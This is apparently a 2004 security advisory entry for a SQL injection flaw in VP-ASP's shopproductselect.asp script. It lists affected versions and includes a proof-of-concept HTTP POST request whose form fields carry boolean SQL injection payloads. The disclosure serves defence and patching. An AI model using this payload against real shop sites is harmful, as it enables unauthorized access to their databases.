exploits , vulnerabilities , articles , Virtual Programming VP-ASP Shopproductselect Script SQL Injection Vulnerability

Title	Virtual Programming VP-ASP Shopproductselect Script SQL Injection Vulnerability
Published	2004-06-14-12:00AM
Updated	2004-06-16-02:45PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	This issue was reported by "Thomas Ryan" <tommy@providesecurity.com>.
Vulnerable	Virtual Programming VPASP 5.0 Virtual Programming VPASP 4.50 Virtual Programming VPASP 4.0 Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Advanced Server SP1 Microsoft Windows 2000 Advanced Server SP2 Microsoft Windows 2000 Datacenter Server Microsoft Windows 2000 Datacenter Server SP1 Microsoft Windows 2000 Datacenter Server SP2 Microsoft Windows 2000 Professional Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional SP2 Microsoft Windows 2000 Server Microsoft Windows 2000 Server SP1 Microsoft Windows 2000 Server SP2 Microsoft Windows 95 Microsoft Windows 98 Microsoft Windows NT Enterprise Server 4.0 Microsoft Windows NT Enterprise Server 4.0 SP1 Microsoft Windows NT Enterprise Server 4.0 SP2 Microsoft Windows NT Enterprise Server 4.0 SP3 Microsoft Windows NT Enterprise Server 4.0 SP4 Microsoft Windows NT Enterprise Server 4.0 SP5 Microsoft Windows NT Enterprise Server 4.0 SP6 Microsoft Windows NT Enterprise Server 4.0 SP6a Microsoft Windows NT Server 4.0 Microsoft Windows NT Server 4.0 SP1 Microsoft Windows NT Server 4.0 SP2 Microsoft Windows NT Server 4.0 SP3 Microsoft Windows NT Server 4.0 SP4 Microsoft Windows NT Server 4.0 SP5 Microsoft Windows NT Server 4.0 SP6 Microsoft Windows NT Server 4.0 SP6a Microsoft Windows NT Workstation 4.0 Microsoft Windows NT Workstation 4.0 SP1 Microsoft Windows NT Workstation 4.0 SP2 Microsoft Windows NT Workstation 4.0 SP3 Microsoft Windows NT Workstation 4.0 SP4 Microsoft Windows NT Workstation 4.0 SP5 Microsoft Windows NT Workstation 4.0 SP6 Microsoft Windows NT Workstation 4.0 SP6a Microsoft Windows XP Home Microsoft Windows XP Professional
Not Vulnerable
Code	No exploit is required. The following proof of concept is available: POST /vpasp/shopproductselect.asp HTTP/1.0 Referer: http://www.example.com:80/vpasp/shopdisplayproducts.asp?id=6&cat=Groceries Content-Length: 227 Content-Type: application/x-www-form-urlencoded Connection: Close Host: www.example.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ALT.COOKIE.NAME.2=8P.9.7080.2N2,20.B9N9P954OO4OM4,4; CustomCookie=TommyRyan x1Feature1=28&x2Feature1=18&prodindex=3&quantity=1&quantity=1&quantity=1&act ion.x=5&action.y=5&Processed0=15+AND+'a'>'z'&Processed1=14+AND+'a'>'z'&x2Fea turevalue1=19%2C+17%2C+18&Processed2=16&x1FeatureValue1=+2+dozen+%5B3.50%5D
TXT

Vulnerabilities - newest 10 RSS | More

2008-12-01 SystemImager Flamethrower Insecure Temporary File Creation Vulnerabilities
2008-12-01 Rumpus FTP Server Command Argument Remote Buffer Overflow Vulnerability
2008-12-01 Rumpus FTP Server HTTP Command Remote Denial of Service Vulnerability
2008-11-29 Multiple ActiveWebSoftwares Products Login Parameters SQL Injection Vulnerabilities
2008-11-29 Venalsur Booking Centre Multiple Cross-Site Scripting Vulnerabilities
2008-11-28 ReVou Login SQL Injection Vulnerability
2008-11-28 Web Calendar System SQL Injection and Cross Site Scripting Vulnerabilities
2008-11-28 SailPlanner Login SQL Injection Vulnerability
2008-11-28 Livio.net WEB Calendar Cross Site Scripting and Multiple SQL Injection Vulnerabilities
2008-11-28 Subtext Anchor Tags HTML Injection Vulnerability